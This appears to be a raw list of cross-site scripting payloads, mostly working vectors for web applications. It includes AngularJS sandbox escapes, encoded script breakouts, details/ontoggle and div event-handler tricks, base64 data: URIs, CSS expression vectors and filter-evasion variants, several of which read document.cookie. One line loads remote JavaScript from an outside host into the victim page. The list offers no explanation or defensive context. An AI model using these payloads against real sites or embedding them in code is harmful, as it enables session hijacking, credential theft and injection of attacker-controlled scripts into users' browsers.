{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=''.sub;$eval('a(b.c)');[].push.apply=a;}}

{{c=''.sub.call;b=''.sub.bind;c.$apply=$apply;c.$eval=b;$root.$$phase=null;$root.$digest=$on; C=c.$apply(c);B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='alert(1)';astNode.argument={type:'Identifier'};");m1=$$asyncQueue.pop().expression;m2=B(C,null,m1);[].push.apply=m2;$eval('B(b)');}}

d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g

d1bvs</script><script>alert(`XSS`)</script>c579g

"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>

“><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>

<d3v/onauxclick=[2].some(confirm)>click

<d3v/onauxclick=(((confirm)))``>click

<d3v/onmouseleave=[2].some(confirm)>click

d="alert('XSS');")";

<data id=x tabindex=1 onfocus=alert(1)></data>

<datalist id="xss"><option value="&lt;script&gt;alert('XSS')&lt;/script&gt;"></datalist>

data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy

data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg

data:text/html,<script>alert(0)</script>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>

<details onauxclick=confirm`xss`></details>

<details+/'on+/ontoggle=1^confirm(document.domain)+open//

<details ontoggle=alert(1) open>test</details>

<details open id="' &quot;'"ontoggle=alert(1)>

<details/open/ontoggle=alert()>

<details/open/ontoggle="alert`1`">

<details open ontoggle="{alert`1`}"></details>

<details open ontoggle="alert(1)"><summary>Click me!</summary></details>

<details/open/ontoggle=(confirm)()//

">'><details/open/ontoggle=confirm('XSS')>

>'><details/open/ontoggle=confirm('XSS')>

"><details/open/ontoggle=confirm("/xss_by_Y000!/")>

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>

"><details/open/ontoggle=prompt("/test/")>

<details open ontoggle='self["ale"%2b"rt"]&lpar;document&period;domain&rpar;'>

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>

dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>

"><div class=progress><div onwebkitanimationstart=prompt(document.domain)>

<div data-url="javascript:alert('XSS')"></div>

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">

<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>

'">><div><meter onmouseover="alert(1)"</div>"

<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

<div oncopy="alert('XSS')">Copy me</div>

<div onkeyup="alert('XSS')">Press a key</div>

<div/onmouseover='alert(1)'> style="x:">

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

<div onpointerenter="alert(45)">MOVE HERE</div>

"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>

"><div onpointerrawupdate="console.log('XSS')"></div><!--

<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">

<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">

<DIV+STYLE="background-image: url(javascript:alert(1))">

<div style="background-image:url(javascript:alert('Successful XSS'))">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image: url(javascript:javascript:alert(1))">

"<div style="background-image: url(x)" onerror=prompt(document.domain);>

"><div style="background-image: url(x)" onerror=prompt(document.domain);>

<div style="border-image-source: url(javascript:alert('XSS'));">

<div style="content: url(javascript:alert('XSS'));">

<div style="cursor: url(javascript:alert('XSS')), auto;">

<div style="list-style-image: url(javascript:alert('XSS'));">

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x

<div style="width:expression(alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<div/style="width:expression(confirm(1))">X</div> {IE7}

<DIV STYLE="width:expression(javascript:alert(1));">

<div v-html="''.constructor.constructor('alert(1)')()">a</div>

';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//

";document.body.addEventListener("DOMActivate",confirm(1))

Read more

Testimonials

Nothing to show.